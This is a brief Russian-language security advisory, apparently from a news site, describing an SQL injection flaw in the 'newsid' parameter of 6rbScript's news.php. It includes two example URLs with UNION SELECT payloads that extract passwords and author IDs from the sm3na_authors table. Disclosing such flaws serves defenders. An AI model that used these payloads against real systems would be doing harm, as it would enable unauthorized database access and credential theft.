Программа: 6rbScript

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «newsid» сценарием news.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Пример:

PWD

http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors—

USER

http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors—



Оставить мнение